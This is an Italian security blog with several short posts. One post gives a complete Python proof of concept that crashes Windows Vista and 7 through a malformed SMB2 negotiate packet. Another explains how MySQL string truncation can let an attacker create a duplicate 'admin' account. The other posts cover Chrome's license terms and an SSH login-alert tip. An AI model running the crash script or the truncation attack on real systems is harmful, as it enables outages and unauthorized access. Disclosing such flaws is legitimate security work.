Dall’avvento del Lamer Exterminator (che ti riempiva i dischetti dell’Amiga con scritto Lamer! ) sono affascinato dai virus e ho decisamente la mania di leggerne le tecniche e di capire come sfruttare le vulnerabilità. Ce l’ho nel DNA.

Alcuni antivirus includono l’elenco dei virus, sfogliabile dall’utente, ma oggi anche Symantec offre la lista dei virus con scheda tecnica e grado di pericolosità. Una cosa fondamentale per ogni appassionato di sicurezza e di hacking.

Enciclopedia dei virus

Il nuovo driver che si occupa di gestire il protocollo SMB non gestisce propriamente gli header SAMBA per la funzionalità NEGOTIATE PROTOCOL REQUEST, la prima query SMB inviata dai client al server ed utilizzata per conoscere il protocollo da utilizzare.

Poche righe di python sono sufficienti:

#!/usr/bin/python
# When SMB2.0 recieve a "&" char in the "Process Id High" SMB header field it dies with a
# PAGE_FAULT_IN_NONPAGED_AREA from socket import socket
from time import sleep

host = "IP_ADDR", 445
buff = (
"\x00\x00\x00\x90" # Begin SMB header: Session message
"\xff\x53\x4d\x42" # Server Component: SMB
"\x72\x00\x00\x00" # Negociate Protocol
"\x00\x18\x53\xc8" # Operation 0x18 & sub 0xc853
"\x00\x26"# Process ID High: --> normal value should be "\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"
"\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54"
"\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31"
"\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"
"\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57"
"\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61"
"\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"
"\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c"
"\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e"
"\x30\x30\x32\x00"
)
s = socket()

s.connect(host)
s.send(buff)
s.close()

Full disclosure – Vista and 7 BSOD

via PI: Falla IE, tutte le versioni vulnerabili?.

La vulnerabilità è dovuta ad una “feature” implementata da MySQL per velocizzare i confronti tra le stringhe e ad una soluzione utilizzata per inserire dati troppo estesi per la dimensione della colonna: il troncamento.
Nella configurazione di default viene solamente emesso un warning, che spesso viene ignorato dalle applicazioni che usano il database e quindi non indicano il possibile problema. Utilizzando la configurazione è possibile convertire gli avvisi in errori impostando il SQL mode STRICT_ALL_TABLES, tuttavia questo renderà inutilizzabili quasi tutte le applicazioni web.

Ma vediamo la vulnerabilità…

Per il confronto tra stringhe l’impostazione di default di MySQL non prevede l’uso della modalità binaria e quindi del confronto bit a bit. Vengono infatti utilizzate tecniche più rilassate che effettuano l’operazione di trailing trim sulle stringhe. In pratica scrivere ‘software engineer’ e ‘software engineer     ‘ è assolutamente lo stesso in un confronto con le impostazioni predefinite.

Inserire un nuovo utente nel sistema comporta ovviamente la rilevazione di eventuali nomi utente già immessi e quindi una query del genere:

SELECT * FROM utente WHERE nomeutente = ‘admin   ‘;

Per il discorso fatto prima il sistema cerca ‘admin’ e la query è equivalente a:

SELECT * FROM utente WHERE nomeutente = ‘admin’;

Ricordiamo però il discorso del troncamento delle stringhe e supponiamo che nomeutente sia di lunghezza massima 8.
Se noi inserissimo il nome utente ‘admin   troncami’, tutti i caratteri che compongono la parola ‘troncami’ verrebbero rimossi e la query risulterebbe equivalente a quanto visto.

Facciamo un passo indietro. Al fine di velocizzare ulteriormente le ricerche su stringhe MySQL controlla prima la lunghezza della stringa inserita con la larghezza della colonna.

Nel nostro caso ‘admin   troncami’ ha lunghezza 16 mentre il campo nomeutente è di dimensione 8. Di conseguenza la query di selezione per controllare se il nome utente inserito sia presente non ha successo ed il sistema procede con l’inserimento.

A questo punto viene eseguita la query di insert:

INSERT INTO utente (nomeutente, password) VALUES (‘admin   troncami’, ‘miapassinmd5′);

che però diventa

INSERT INTO utente (nomeutente, password) VALUES (‘admin’, ‘miapassinmd5′);

A questo punto ho due utenti admin nel database e posso entrare tranquillamente.

E’ tutto oro quello che luccica? Direi proprio di no.
Ecco una porzione della licenza d’uso di Google Chrome che potete leggere all’indirizzo http://www.google.com/chrome/eula.html

11.1 L’utente è proprietario del copyright e di qualsiasi altro diritto già posseduto sui Contenuti inviati, pubblicati o visualizzati su o tramite i Servizi. Inviando, pubblicando o visualizzando i Contenuti, l’utente concede a Google una licenza perenne, irrevocabile, internazionale, non soggetta a diritti d’autore e non esclusiva per riprodurre, adattare, modificare, tradurre, pubblicare, eseguire in pubblico, visualizzare pubblicamente e distribuire qualsiasi Contenuto inviato, pubblicato o visualizzato su o tramite i Servizi. Detta licenza ha il solo scopo di autorizzare Google a visualizzare, distribuire e promuovere i Servizi e può essere revocata per alcuni Servizi, come definito nei Termini aggiuntivi dei Servizi in oggetto.

11.2 L’utente conviene che detta licenza includa un diritto per Google di rendere tali Contenuti disponibili per altre aziende, organizzazioni o altri soggetti con cui Google abbia rapporti per la fornitura di servizi diffusi e di utilizzare tali Contenuti in relazione alla fornitura di tali servizi.

Non so se serva commentare questa cosa. In pratica ogni cosa che fate con Google Chrome può essere usata da Google…

Alla faccia del Don’t Be Evil! Non usare Google Chrome mi pare l’unica soluzione

Di seguito vi riporto un trucchetto molto utile nel caso rendiate disponibile un servizio SSH magari che utilizzate solo voi per l’amministrazione del server.

Non vi riporto consigli banali sulla configurazione sicura di SSH in quanto in rete ci sono risorse molto complete da consultare tuttavia questo consiglio vi potrà rendere più solleciti e tranquilli nei confronti della sicurezza del vostro server.

Vorreste che il vostro server vi notifichi via email di un avvenuto login? Così non appena succede qualcosa di strano o inaspettato siete subito allertati.

Il mio ipotetico server ha l’utente di root non accessibile via SSH e un solo altro utente con login esterno abilitato.

Aprite vim e puntatelo su /home/utente/.bashrc

Ad esempio: $ sudo vim /home/eduard/.bashrc

Raggiungete la fine del file con GG ed inserite il comando seguente:

echo ‘ALERT – Accesso al server (NomeServer) il:’ `date` `who` | mail -s “Accesso via SSH di `who | cut -d”(” -f2 | cut -d”)” -f1`” vostro@indirizzo.email

Abbiate ovviamente cura di sostituire NomeServer e vostro@indirizzo.email con i rispettivi dati

Salvate il tutto e provate a fare login. In pochi attimi eccovi recapitata la mail

Hanno ricaricato il sito… peccato non abbiano sistemato le vulnerabilita’…
Chissa’ quanto impiegheranno a sistemarlo o forse a bucarlo di nuovo… ormai e’ noto a tutto il mondo…

PS: Se volete un sito… spendete qualche euro in piu’ e ricorrete ad un professionista… di maghi del computer improvvisati ce ne sono un po’ troppi

]]>